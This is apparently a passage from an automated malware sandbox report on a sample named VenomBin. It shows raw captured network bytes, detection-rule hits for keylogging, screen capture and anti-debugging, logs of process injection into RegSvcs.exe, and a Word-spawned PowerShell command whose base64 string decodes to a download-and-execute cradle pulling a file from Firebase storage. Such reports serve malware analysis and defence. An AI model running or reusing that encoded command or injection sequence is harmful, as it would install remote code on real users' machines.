åÖ6ñÄËâ\MhC¶¤ê^Xá>/+öM }õÒ˜k‹lôºL»Û _¨Š¿„ àwD€ïzeð@þ¿­É âë37cùtd†Øuòì:‡ÚÈ,Á2£ë~DžȌYƒÝ‡U¸·O$¤ /¡ Ÿ+0 @ôàã³Ï˜}rÁdÔÄé‰Ì¯1«Òé.ÿÑ( :žÖQ/: ‹\SJ.nAú55½õvuì§)¼k ƒV†Ðùô¤¤nî2êˆEú4ŽQ·Éè"=ëÇI<ºÞ…Ñ2w,Þ»4Îk&mLàO‹`ÎY .¬ýqL%›õçî^Bӗž§#ü‚ þæ}Î0,£ 2©_õ .€e<“ü˜4¡0j,j3^³\&à6Ødĕ츕Šå³L®ÎA”<uó³šÂc4Á!rLÑTñÆ´†×F±œúü}3ˆ¡#åµsB ¥˜Œ»èèW–©ý¦^얈¾ ¨ ãS»ïª ¾>nj¦ð¬Ëb9ò&¯N±%6«ÏÕHÞ&•óÕåûŠíõ‚rèö Gçró–ßG¥š%|:µ¡zãèŽ÷ÔÍ{c¨'*}‡@j3µÆZpÅڈ–ûâ«:%Bl®uf(ô¥AE꼖»÷¸â~M^R®:Šgrýˆoë?M•\ îÌ>^¡ L/ &¢™Ûô³ô„+€‰T¬ù`ön»QñÝCih„ 0WžÌñxÞľo+9ぇNÅΌÆ­2ïÒ]á.}ÁUŸÇ«Z®Ãcx8 ¹f¨Kµ+Ý*FZñ'ÃéÐhúÑc®-lÃwŒã;xg ˖‘¨ ºãÔE}¦‰€Pà@
Data received 0
Data received ~W‹K¡GGÈ»¦±UJàTM}$˜iS´Y÷Ù ¨1Ëܞ£‚ë±}IâÍyˆa*·Gá§É¾™Æ—-qyxʟ´Ê~½Â¤/sܚîe—Ã1hr659«ÇyGÃŽ!è^èòQ¸þ¡ÔÛ]#ÜäV
Data received þ¬þÛ«:xTòoëš`bô.½oÚۑK¬uÎVOΣR¶ümð =§§™¥èÁ`ìÃãѓ·^¥á¡˜G.G L.…3 QÛ­¢%=É¡pä”öª‘àÈO‰ åžô#ê^ú Ž·Mɾ{ñýøçY³‰=ûVšb Ѓ*1Kì¿Çù[6Ô¤Kõ<R…Œ®‘’¸#”åJ¦nKçð‚?óÞü[2ö?Ø'ÂÀ~Ä î÷Ðr¨'–@Bá’åo_Á ¬z钣°ïa!êCD(DPôqê¿|+Ò]›Èb—º‘Ù]ÃÆ2‘,¸]½Ã Ãú‰¹šŽdN[Ýs¨D_-N˜]Y¡%ÐlÙål ¸¼×ûò?Š~¯ Z+XvPZík7[Zµ×õªNkðNµàd×!ŸŸC=qè{ª]Ìû*`}éØ ò‘Ný¸±ù¦,¾™ *ë vÍ°d±¹ßè]vI ý'Ô!šÂ@\òÝuvÑ·zÀŽ‹9d|¬îfSp¦Ú™2:9«ê*¯8k¨É^Ùm>Åï$3ëènciæ¿-¦…@ÈE.4š·›ÞÄ-,ë1é¥Í<U«i‰k¹·j±ê·óý ‘¸år sê–³‹ëý½€lj;Ó²+MÃó™´Ô²)¨’e;*”Š z“s!CÜe¾ó•‘¾á¤¯E_†»’ãÍ/,ê1{*VëæX€üò¹|£KÈ[¿­% ŒDd,„èŠÃï؆õ‚®+è…ï,vÏ×bì Â,-RÝ?ÇS÷uÔt=ϝíÓª¶á ‰BÎi¿7ٙàðΞ¶ÈËÛR‰x(e~(êá²ÈˆÞ±3®îP»Ì/׍æàaÇÙq$߁ÕñµèËb½ž*GHVåõÁuWí³ølòšê·iÅ4x¦è,Ê! º$Ä­XÞ-×ågô¸ãÝU5ßÍÎÄ`³Îß)Z—ÙAWMe<÷<SÒ®»ª‹œg_‚b˜Zg¿ÿ‹Â¸=cø”CcÕÖ oõ¨MBìTû@»fq\7¶º DÀøæŽ åFdã 4Fåj¯~¹ÃÕ@˜å#±á¡¾i–É<¹)f!clæ*¯Èž¸èbîzH)/ÔÍP ­ £›RÈ–cãÁ÷¥óH”tiÿåƇ¿–0¼_Á¸­¥@Œç>ÑIkFóU6n´b˜oXþÛ#rŒ¬CíîÊ'oϺn=±®6Ÿ€.cJ‡hˆg¨ §‡‘¬EIåÅ.s™æáÀæTb^È».9¢º¦;~7%ÿÈùʯõ¿Ù }ÀÒ ¢ù,‰ yUøûf—ìÜç¤Q®’ú‹ZÜ«ßÖÔZf€Ú¯êy†à&ú _Íg¶épUÎÁ ?:M!ã§é‘Ò?¹rà[´œ1ivˆ0IŠ®Mž% þB*^§‰à¬ºÔù–ûĞ7†{õj< ZÑÌÒ¾àÎèçXÌ÷ٍ ­ó ( ;¸Ï>-ªóù.k¶±i¥ï>Q¾7uaeä –Àײ ãf]ÃFÑdj©³årÀðýM•j­épAnIè5#ëÈÔ
Data received lL âÜP¥:A2×–gïºA~8ßó†É¿È:Þ$輨ê˜zÌ= ÏIޅJn0Ic}Gm®ï‡•x›9áUÜÛ[g7Õ·hñêörØËd§5Dx®âs˜‡®Õ¿\-8kËY;ouG]쮎͞ì˪¥]ñëÙë&p˜¬lh&¶Ž/°Ôt×øÞ^µ“ÿQ ÝuY2~À±1xlÿŸ!×ÿP{=†•Ä¾•ð8J—8FTIHmæ͌8£YÚéŠ5AÈvį¶f‚àÆsG†ÛÍɚU̾Ѷ;;áʉµUyŒjGÿÙkåƒ[¯÷öö‡gGd¿JóNˆ‰—¼k cÿ²˜¡Ü–õ.ÁV¤¶IÂ|º.« 2D÷ÅtºùP+hûqQ°PVçõ¿y?c¡t¢()Ÿ65ÆÑ£vËDhóàÙ>d©Òw¢õ©3.›²í:!Ë^ *gÆräOÚÌá>.µ‹â²Eòäř´@”q‰Ï´? «šñbä³ûwmÞÀ­xJp:­'lž ¢=#ÃÕó"ó‘ ¥‘‰Ž'uèÍdÍNït¹àw OmjÕlËâ’>á™9Åòëÿ¼I¸tø²ž%§õÃ4ÕZ¢îáåޙÙÕÉÏaÒ|ÇñÖËÈ`/…s¶:ïùnïà íÖ=mªhHÊëC!z{®)ÒÚµž7'YZËÁ¿óuz>ºK唚‡v¦KÀÓÈMᬅÿåx4RPDíVÅã~àˆ+#¸ û!H ’¥xðÏ2Fãà[™Tv›šøürý|aώOaŸñ•6€9`àšà¹ûûåL²P¸€šç$× -‹\¨·5²¹yëÕºN6ˆv2Üxpìhè3'€Évù*g|FÐrãyμóï'ì’t˜û¹QæÍÝÅr‡Ç¯Y%€:­ÜfíH7‘EƒRʛUI¡&‰õŠ›vTSnü€šÞÛÿ(_—œ3GõùȊJ£®P ú!~}ô¿^pCîZ‚ÁŒ×N´«¡©öÖ(:G4ˆp{X(ۏ\kc^È/“ºÅ㞦¡3rsÆÑÜFÖ¢à½DbD[:€‹ ßRd.÷’Ï£ÍL”yòdb7*{fî÷£1¼^ÍJE¹ñ±8_v…<v£bÆM=üÀ³ÃVë—OÎ}àP­ØÔÐS©)?õ‹äñ¦f½ÿñYòbGo£ÊUõäžOær ñ‡xá™.(Yæ`‚2Ø,>ÔQ’‹R…É$ÞúÙÉ]ь#JšAJړÏg8-«Fá#©GkáªIÂöË_ÌòÕú,ˆ¡OŽ¡Žá·Vðµ÷ï?Åzí§aü†&â"Æ|smÙß3‡ù¼½J úßdØ«JZæ£áx¸êxڒU(àIfÓi&ŠUM›ñð7Úõ²\… <0öÃëüMˆ3iðL) / °]±~z@ÙÍUèËæŠD–U¤=³áÎ'åšÞuN´êáÉvþmû@P_r¹Z¤uWvÕV:›Ü¶!Ç xxWÒWW,8]趱'm’N´&ü¡Û’FM’ÜCX‡7‘`e›:ËØÍRh·´Ú&jȘÙÛÙÍSM œÜ9’0.㡍N¡ùGjHU˜Ï8–ª¤ N>| TÑà½ê§]ÂÓÚl…FÞŬ“/”î3=â:bídc )‘Èæ9?þ¼]šð­š§ž^xƒ¸,uxl´•žg«ý_ì/3ƒ)íÙ ÐõïL pÿKp-CR¤}uéÛxÚr¦ø㙢4®ldÜåHˊ\TÔÇUmcl»
Data received ѹaØ1C§”Î'P¢³ü˜öøæoá««çbS7ù »CDMô‘Á%‡Ohn«PdÛQA¾sÈ&–4ÄwBΐ4ùPÃZ4ðYAØljW¬ÎBËÈ,Š ÍÅë¥/&™’ê=ÆÄ N‡ŽþΦ*¤2Ôw¾+¦µÉêIð¤ŸÈÒ郎y«8};Ykg_„›C·ºc$o¿­Œ}Ìxè0‡ì Ù^á®ÑÔv­­,@iÕK`èmR0Ûê°.òË¯+]á_Qíxezl«Ú
Data received ¤>ñMej·B–îõ¯4Z“Ù…›½+t]ÿþáê§Ó uà—‡æÿ–×:˜Q!u&ž¤G}X?|¸‹J uö>x=>X“l UYFOÓY¶&üfÎö—Ù@Ypê½@?½ŠÐø•cÄjBõÞØE¹Ø“¬¤×.Ž8ÕB”B‘.²Ô\Ô}N$ ]Œ»>›¿ºdªà×te׊¡÷S‚T1â>ÿ€õvîßYì!wŠǺHB¢Æ Ý'Uª1m–{51naôÑ:±ÊO@Î?®ß^lÂÝù†R/-¯¡ ¯„‘Ú-Ž|”âïÉN÷k‹&wÀě ƒ–¨û ¤¹“T¹XjlJéK’|[45­Èþ8û±×ò&-@¿Û ŸÔ1˕¸¤^ 䴃iU·éã?Z40ñî|ïÓᄶ^œHÖ³isF“¾Ù^ƒ§ç²C+^éó0âð­¡ÅéwmŠ.Îiy`-¢[\Ò2r/42úKû‹îO:!νÅA>2ÀGYÈÆ×6J£óãýb‚Š¹—0c„ÔÇÿsµæ¬ÍÁ£`úðº$›PÜ6ÉùkâýE§Ûvã VýÒ ôAPlyªf3Ù6ËÕî"BUµ(^ì4ßë+ï-Æü2ô'Ä3o¹XƒÍ0¨ûÇfT’¥dalýV?A¨Ÿ#Í5äTP–TqŠó…«<Ú"ìbÌ:d1¥ °!ÅËïâ0ø €d6énA¿þø >#-IB;I–]vxûèõ[Iӄõð©S“á`Òue<OXmAB£µ‰zàJ->–z<“ßò;-=P}t¾ºB’äš/&êÅڊ#S˜Øli AôaELþç¾Dké<³»ªvQóŒóåظîeº‹2ßYQ!3/Í Gؖ§´£'m£ùöY‘äÁ 6¥šÅ]ÀëýMz}ŽJ1^ãÈýñyø•×Iªg´ª.ç3&#RϓŒÎý«´SR™ü®bÚНãÓß äËH۞ÿà¤à—½Þº,ݦÛðÀÃxºýí_ªgŸ>CoÐό÷/¯cºWö-©Téi 1ÊQÓ»K§³óæQd7™XQ €±†žwÊ"öœ õzgIËÉ]lR"?sª }Þ,Ÿ£—1AڍâTQ:6°«ÜžýèҔ¬Ê&õOè—Þ+žøǸýÂ\É- à^xH-ˆ+QuµÐlS¶G-Y,Íý+ Ç 2-lâATÛT}W†š%=sì$ÊØðøì÷áŒ=Šûc+ÁM)yjlÂ&¼ îGŠIh6_f:£ÙxÄûh¾§µ×låñ†Þ’î«•O¸7'Ç<¡,]—~ÂYMÉÒ`Ñ}–­ŸŠþ,¯ Ãv²Mêþ&[rPp{ŸoR;Ó4 è÷ÏK˜+¯ú­ðÜ¥M‚ÛÅѳÐ4´O—/"èÈ8Վ=#µáÀCÀî}q~/Aã<¶@Ø=ilÒÒɟÌüZÈÆT–T[ÌF+ïü﯁
Data received ìÀ”?;sá÷®ú}¾+§Kê‘—³< o¥a"?\úüÆ&µêPçÒ¾· ñ ”u-rxF2K¡IeÙH“[?!QЖ¿gëO½Ó#LÄ/1Ìk|p»1ð–Ì¢9y‰SþêW…Jägù¼¢-‡¯g֎ufúñ£˜;>¡7xñ} zágðÔðE™Bž|úA† ?¤ |$ÇG*“ÔJÙ÷uhzñ#ɝÛKà­Nüïìû°]j@•@ÀY{q9F¼]\<ußè2²F"¨[ÔÜèˆB~Ë%Fˆ´ˆo®´`AR7Õüe)‡K¾à‚®çë“?³…Áx4/á¶M’«æ· Iɀâ«ïÆñ ØtóŒ¢K$4͚S,I±ÔQÍk‚Ã#©'÷póv!JsÓ ÷û­ ‰Ç$¸„RzTÑZgZÍGìíH½9¨ü¥¹Ìºo'›8Ò¤‘«w€·AóGÉ+‚KÊ@ï¤Bë—O.Ó7ˆANp~xDã’n,BÄÿJùy×-«ÊÀ»º ]¼Î+…Y»@é/Ç)<‚Ñ|E TßÔikäp’t‰ÇÂ@ZR‡6kª[^ ßsÛÄO8ŠÖdæ%4Ñ|r7Ó/ «Î¹ª|Œõƒhܘ|j,àše܏EªÚ‘ó&8¶¦5ìKƞnp‹¾åÊê'ȓè(&o¼Ë ÄÑì Ý P”Ð`ð¯P¹ðAÕ|£‹ &›ëGþ^µ=ÞF|Üþ„õ܅p³Ïž‘ ôm.Q7‘ÑS)»Ã'Õ·¨æ©ôàØ+nÛ,LœêïÇ*¿Òà^lu®, ëÕ7Ž#7RÁÂ'^öóãÏQÎ(Á2‹ê_S0wÍxÝUjï ¦.L´+šâIŠ,'îY&’{Õ [™é ^Îà[ p(”<ü BV.`£[—N¼z';âC°h¤È’ÝFºéSúƒâö,ÈHZ‚ö|…~çž_F¦_d‹r[ì[ÝÂnÖ%ŽNË0¿‡ÁÛQÈSR^Úd/|¦n'mÆ÷”´êÇô‹4„T"=¬’'õ!ðØêÑhZ:æޚú~&t-ޒ€<¶ _}£œ0ùûvä²WQl† «Q_$@÷ñh§p¶ËÜDÔÇxÍ ;Ó¬e Eézä£2ñ'Ó \ò•B„pu“š£w=‰{¨¯=OI‹¡†cÿÛ=0^„Õ½öØç¡'ó#ÚIz6ô ¹héÊ-Mvp;,#÷OÏf[K%Ê£íÅ¥Ní‹ùX®Gš´Åâ2ÑÑᥩšŒù ÎÈ"Rãê¥þ$÷”ÕXO€—ê¯5‘pS½NXÔef÷:^t™sÞ_=o6†·$+aS 4 }÷ìÕ¨/-?s¨ &™Âþ<ab=ñß²ø2”á†WÈ5HðƒqŸŠÄW±r=à|j¤ rŸ<ŸG@£Ž‹ÒìÑyìûøË8và/ËÿîÔ£‹í»d oy‹.ƒÖ‰$Þ'eù»{¹Uü؎qâî2Ö¶”R}Ucâ1²_“žDv+Oð-ÖFÙÓ fFómb`a¶Œ5€9¬ý"UÝ ¹ËF Æ+¥`ÑOÁ*ZSŸtIYÎÝÏ¡©;AœÜâ¾Góä1ßÛオ ÂâÀPíÇÒumíÜÒãnÎ•È 9 ¼jþÇÆí°iý$Q¢ y íè}€s„ 7«àP¹imƯoã`ðƒn(Ü©}CkE¹/”RÆK@ÃîÀ9×辋€¯Uwç›|ël çÌ$¾WQæµ"ðàx¶M§M¡9ØØJ
Data received ÁŒÌ†)§¿r-â¥'ÄÍ (½S¤Ð‡ o_¤ûù’lxMªûkª×sßËõŒ“ðׇ® Ä3,¤f\ägms©­²%Ö<ãYIñÞ}‘†HD-hŸÊŒAQ î á±*bH¾‡`¢9!™ê8 Ýëyš4ŸzPœW¡hnk=R«Œë#•¥%ŒzÕMXγeûîS: à ×&ìrŽŽ7`PCêå@¢·ô9½…©ÞÆ; ÀYÝ jè[=‡0̨º‘ðÂXq¿è į—l™#¦"6FŠ 2§’p`NÄN"ƒmsÌ÷–…š­Hƒ
Data received J½¶K„j¢ÚÛG} Ë)‚Ö €@Ü)Ƕ \ÛßRÚv:m6AKIºÏÇõ{žú=ZÇ%D§1}é›Ð}‚ $ÕYs¶æøJd]°§àYKˤZéµJ‹UZ`£º”cq7¡®ƒF_&EDB9‚'˜Ԑxm„)àÛ¶E7>¬ås!@®aãð‘«ýꪀŽN#ý%š6µäx†gÍõÔǾº›¿ñ€RŽ‘±ý¾C7è¼Ñ}ۆ2|ÿʁÁ`üUñhĚx>„g•¼3làA…Çê½Ã²Ú ›p±èçš=`µ‰Û+[ÁˆŠîa ‡-Dwìó-™€%uyO8ËKl±dt9府š@­V­$N< …jø_·0Í6ù™a*AGÑ)Tp§"X%v„v_ùQÙl\¶]¾]þÁGqù<Ó ªRíÏWº%‡°JÉ~ߧ~¼ÆOž¢öÉó²X›ô4yÅ ’~?Uïà{#º‚ÎÉ6z 6‡ª(šÌÍÁdRc+âævŽÕ´”kñî c·¹%DÁq*]é4íЂÿ²‰ñۉ̓òÝø_îQÄЊ?/ñ¾IÒ>Ùޕ…bŠàŸý˜`é ÆFÐl™÷änM úxRÛ| (øñŽÜëÛ2Jl/ºÆJHeM•ÏEýuOÉ).¸ê¦£{/¤Âښî:]LˆÂ7ÐÏ÷mFk]ž‘l÷¸$ídXÕL…a4À “:;2Y ­¾Î›ð?C¾ÇÀýêsöäO…,ÀR¸¥ñpºôÕ°óCȺ̯ìß,Kèf‹û…Ñ7–£šC·~d#彐<ŒKÌyK¯&»økÇ ˆ]²5ôÑ~6KD›7œYD¡aL•Åô>™Jгm¹qÔKº™Ë5âš4Ú ð+Å%»¸Ÿ‡n.T˜)¸ž2ŸVŠÞº…!êååz¼UI2LËp¡ê+´ ŒÅøÙó ]ccêð «ÚFñãûðAU Ï ‚ÖïŒÌ1§~/z–råð™ákóÄÆ·yz>Ýë÷°-%§Üôw֟/œ¼bë@öãÒnI¼”Øp墣ÔúELŒ‡ÍïhÈðÅûfõƒ¶SFl+R¤²Ž0SpÓõ{™€àԝì@t¼õi»Ù¾GƒK/tRwz».¶s%,l$}œ ´Ñç—µg‡‘Gt(ÐÖl"n.{Ì÷ƒg^¯%™ñcé)  »ƒ)GPk;4«>ÔIº.­Ÿ×–Ç<$J¸¦ !úƒ?L˜qŒâéf<ì÷ßZYäï­oj%™ˆ´mÁ͔(I¢i’olÈ;]úýÄ{b”ìÂYO1ÌÄ$‰xgÏð;ԝ—þ,‚ò2±'‰/÷g±ì VÔDZøNëo$jîu·ÐÙóS̲ċç|ýËǧEî)'3FY©î¦9%s¥‚ûBC“…H.Ium±$ÿlªÞÛ´Æbjë3I30puÙƚ½ûôÃorãÉÓߔßûž#&ŠyN
Data sent }dŽvh ò#ž^Mðܝ/x8zå%ñd£QVK颦Ÿ\</5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBAv¤¦¬5&ggªðe;NŹuînh¼Ü_” HF¤MaIXÆÞÖD@𧆨(¶Z%cm–•%ZùǗ¤ïï}40³6ª V-¯¢…gh}ù~bàUžÁGH51ôîþÄɇè3-EÿÀŒg¥÷;zÞ
Data sent À[ÕFyßPþÄš¹â&OWm.h4 ¿rá&€­ E‘sÎP!|“‹…Y&)”o©|=ÙÆt*:âÏ®7g?šÏS4pt¹Z–&L„ºƒ{Z³q?W°Ùmççn‚dQ~jd‡+`_µ9göCü”}ö4=ÊþZâEjØØ9—•ìý$¡8ãMïµ¥€‹OrM»pQ¾Aøøƕ¶~O¬è:F@xƒÉŸe¿@¢ŽFhN˜w4 ‡¡L¥€
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
description task schedule rule schtasks_Zero
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Detection of Virtual Appliances through the use of WMI for use of evasion. rule WMI_VM_Detect
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
cmdline ping -n 10 localhost
cmdline chcp 65001
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000378
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000378
1 0 0
count 2919 name heapspray process powershell.exe total_mb 182 length 65536 protection PAGE_READWRITE
Process injection Process 2184 manipulating memory of non-child process 2412
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000378
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2412
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000378
1 0 0
Process injection Process 2184 injected into non-child 2412
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÃÎD`à 0‚®  @ `…` KÀ“ à  H.text´€ ‚ `.rsrc“ À „@@.reloc à@B
base_address: 0x000d0000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ À¼Ã×4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°|StringFileInfoX000004b0Comments"CompanyName: FileDescriptionVenomBin0FileVersion2.7.0.0: InternalNameVenombin.exeHLegalCopyrightCopyright © 2021*LegalTrademarksB OriginalFilenameVenombin.exe2 ProductNameVenomBin4ProductVersion2.7.0.08Assembly Version2.7.0.0<?xml version="1.0" encoding="utf-8"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <application xmlns="urn:schemas-microsoft-com:asm.v3"> <windowsSettings> <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true/pm</dpiAware> <dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness> <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware> </windowsSettings> </application> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly>
base_address: 0x001dc000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:   °0
base_address: 0x001de000
process_identifier: 2412
process_handle: 0x00000378
1 1 0

WriteProcessMemory

buffer:
base_address: 0x7efde008
process_identifier: 2412
process_handle: 0x00000378
1 1 0
Process injection Process 2184 injected into non-child 2412
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÃÎD`à 0‚®  @ `…` KÀ“ à  H.text´€ ‚ `.rsrc“ À „@@.reloc à@B
base_address: 0x000d0000
process_identifier: 2412
process_handle: 0x00000378
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: }dŽvh ò#ž^Mðܝ/x8zå%ñd£QVK颦Ÿ\</5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1400
sent: 134
1 134 0

send

buffer: FBAv¤¦¬5&ggªðe;NŹuînh¼Ü_” HF¤MaIXÆÞÖD@𧆨(¶Z%cm–•%ZùǗ¤ïï}40³6ª V-¯¢…gh}ù~bàUžÁGH51ôîþÄɇè3-EÿÀŒg¥÷;zÞ
socket: 1400
sent: 134
1 134 0

send

buffer: À[ÕFyßPþÄš¹â&OWm.h4 ¿rá&€­ E‘sÎP!|“‹…Y&)”o©|=ÙÆt*:âÏ®7g?šÏS4pt¹Z–&L„ºƒ{Z³q?W°Ùmççn‚dQ~jd‡+`_µ9göCü”}ö4=ÊþZâEjØØ9—•ìý$¡8ãMïµ¥€‹OrM»pQ¾Aøøƕ¶~O¬è:F@xƒÉŸe¿@¢ŽFhN˜w4 ‡¡L¥€
socket: 1400
sent: 197
1 197 0
Process injection Process 2184 called NtSetContextThread to modify thread in remote process 2412
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5284014
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000374
process_identifier: 2412
1 0 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
parent_process winword.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
parent_process winword.exe martian_process Powershell -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
Process injection Process 2184 resumed a thread in remote process 2412
Process injection Process 1184 resumed a thread in remote process 2356
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000374
suspend_count: 1
process_identifier: 2412
1 0 0

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2356
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004a8
suspend_count: 1
process_identifier: 3036
1 0 0

NtResumeThread

thread_handle: 0x00000544
suspend_count: 1
process_identifier: 3036
1 0 0

NtResumeThread

thread_handle: 0x0000054c
suspend_count: 1
process_identifier: 3036
1 0 0

CreateProcessInternalW

thread_identifier: 1784
thread_handle: 0x000005d8
process_identifier: 2184
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
